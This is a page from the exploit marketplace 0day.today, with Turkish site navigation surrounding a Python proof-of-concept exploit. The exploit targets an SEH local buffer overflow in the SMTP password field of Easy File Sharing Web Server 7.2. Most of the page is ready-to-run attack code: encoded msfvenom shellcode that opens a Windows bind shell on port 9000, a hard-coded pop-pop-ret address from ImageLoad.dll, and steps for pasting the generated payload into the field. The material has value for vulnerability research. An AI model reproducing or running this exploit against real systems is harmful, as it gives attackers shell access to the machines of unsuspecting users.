0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Easy File Sharing Web Server 7.2 Local Buffer Overflow Exploit
# Exploit Title: Easy File Sharing Web Server 7.2 - SMTP 'Password' Local Buffer Overflow (SEH) # Author: Felipe Winsnes # Vendor Homepage: http://www.sharing-file.com/ # Software Link: http://www.sharing-file.com/download.php # Version: 7.2 # Tested on: Windows 7 # Proof of Concept: # 1.- Run the python script "poc.py", it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open fsws.exe # 4.- Go to 'Options' # 5.- Click upon 'SMTP Setup' # 6.- Paste clipboard on bottom-right 'Password' parameter # 7.- Profit # Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Locally-Exploiting-SMTP-section-in-Easy-File-Sharing-Web-Server/ import struct # msfvenom -p windows/shell_bind_tcp LPORT=9000 -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 718 bytes buf = b"" buf += b"\x89\xe1\xdd\xc5\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x49\x78\x6e" buf += b"\x62\x67\x70\x57\x70\x63\x30\x31\x70\x6f\x79\x78\x65" buf += b"\x56\x51\x6b\x70\x72\x44\x6e\x6b\x70\x50\x70\x30\x6c" buf += b"\x4b\x43\x62\x44\x4c\x4e\x6b\x46\x32\x54\x54\x4c\x4b" buf += b"\x30\x72\x55\x78\x36\x6f\x68\x37\x30\x4a\x67\x56\x36" buf += b"\x51\x6b\x4f\x4c\x6c\x65\x6c\x50\x61\x63\x4c\x54\x42" buf += b"\x74\x6c\x67\x50\x59\x51\x5a\x6f\x36\x6d\x56\x61\x68" buf += b"\x47\x4a\x42\x6a\x52\x70\x52\x63\x67\x6e\x6b\x73\x62" buf += b"\x46\x70\x4e\x6b\x63\x7a\x77\x4c\x6c\x4b\x72\x6c\x36" buf += b"\x71\x30\x78\x48\x63\x53\x78\x37\x71\x5a\x71\x43\x61" buf += b"\x4c\x4b\x72\x79\x37\x50\x66\x61\x4a\x73\x4c\x4b\x52" buf += b"\x69\x45\x48\x58\x63\x54\x7a\x30\x49\x6c\x4b\x64\x74" buf += b"\x6e\x6b\x77\x71\x78\x56\x36\x51\x49\x6f\x6c\x6c\x6f" buf += b"\x31\x68\x4f\x36\x6d\x73\x31\x78\x47\x45\x68\x69\x70" buf += b"\x42\x55\x6c\x36\x35\x53\x51\x6d\x5a\x58\x75\x6b\x63" buf += b"\x4d\x36\x44\x31\x65\x58\x64\x63\x68\x4e\x6b\x32\x78" buf += b"\x47\x54\x46\x61\x4e\x33\x70\x66\x4e\x6b\x66\x6c\x30" buf += b"\x4b\x6e\x6b\x51\x48\x47\x6c\x75\x51\x6e\x33\x6e\x6b" buf += b"\x56\x64\x4c\x4b\x47\x71\x4e\x30\x6e\x69\x63\x74\x57" buf += b"\x54\x57\x54\x31\x4b\x53\x6b\x61\x71\x32\x79\x33\x6a" buf += b"\x46\x31\x79\x6f\x4d\x30\x73\x6f\x31\x4f\x43\x6a\x6c" buf += b"\x4b\x37\x62\x48\x6b\x6e\x6d\x71\x4d\x51\x78\x74\x73" buf += b"\x76\x52\x43\x30\x37\x70\x73\x58\x54\x37\x64\x33\x30" buf += b"\x32\x61\x4f\x70\x54\x33\x58\x30\x4c\x61\x67\x31\x36" buf += b"\x66\x67\x69\x6f\x6e\x35\x78\x38\x4a\x30\x46\x61\x33" buf += b"\x30\x77\x70\x74\x69\x6a\x64\x31\x44\x50\x50\x72\x48" buf += b"\x66\x49\x6d\x50\x70\x6b\x75\x50\x4b\x4f\x6e\x35\x43" buf += b"\x5a\x56\x68\x61\x49\x70\x50\x48\x62\x49\x6d\x61\x50" buf += b"\x62\x70\x33\x70\x56\x30\x70\x68\x39\x7a\x44\x4f\x39" buf += b"\x4f\x79\x70\x69\x6f\x4e\x35\x5a\x37\x43\x58\x64\x42" buf += b"\x63\x30\x57\x53\x34\x68\x6c\x49\x5a\x46\x73\x5a\x46" buf += b"\x70\x32\x76\x62\x77\x35\x38\x5a\x62\x49\x4b\x74\x77" buf += b"\x50\x67\x4b\x4f\x48\x55\x66\x37\x31\x78\x4f\x47\x68" buf += b"\x69\x67\x48\x39\x6f\x49\x6f\x69\x45\x53\x67\x62\x48" buf += b"\x71\x64\x58\x6c\x65\x6b\x78\x61\x39\x6f\x6a\x75\x36" buf += b"\x37\x6d\x47\x61\x78\x70\x75\x62\x4e\x70\x4d\x45\x31" buf += b"\x69\x6f\x4e\x35\x71\x78\x43\x53\x70\x6d\x65\x34\x77" buf += b"\x70\x6c\x49\x7a\x43\x62\x77\x66\x37\x70\x57\x34\x71" buf += b"\x49\x66\x42\x4a\x44\x52\x53\x69\x50\x56\x58\x62\x4b" buf += b"\x4d\x72\x46\x39\x57\x53\x74\x75\x74\x77\x4c\x65\x51" buf += b"\x66\x61\x4e\x6d\x31\x54\x45\x74\x66\x70\x39\x56\x47" buf += b"\x70\x70\x44\x71\x44\x42\x70\x32\x76\x72\x76\x56\x36" buf += b"\x61\x56\x70\x56\x42\x6e\x32\x76\x73\x66\x32\x73\x73" buf += b"\x66\x72\x48\x63\x49\x38\x4c\x47\x4f\x6d\x56\x59\x6f" buf += b"\x39\x45\x4f\x79\x39\x70\x52\x6e\x71\x46\x51\x56\x49" buf += b"\x6f\x50\x30\x45\x38\x57\x78\x6c\x47\x47\x6d\x51\x70" buf += b"\x6b\x4f\x69\x45\x4f\x4b\x79\x70\x57\x6d\x66\x4a\x76" buf += b"\x6a\x70\x68\x4d\x76\x7a\x35\x4f\x4d\x4f\x6d\x6b\x4f" buf += b"\x6a\x75\x35\x6c\x64\x46\x33\x4c\x37\x7a\x6f\x70\x4b" buf += b"\x4b\x59\x70\x50\x75\x43\x35\x4f\x4b\x63\x77\x67\x63" buf += b"\x32\x52\x62\x4f\x33\x5a\x73\x30\x56\x33\x39\x6f\x7a" buf += b"\x75\x41\x41" seh = struct.pack("<I", 0x1002324C) # 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) nseh = struct.pack("<I", 0x06710870) buffer = "A" * 512 + nseh + seh + "A" * 20 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close() # 0day.today [2024-07-01] #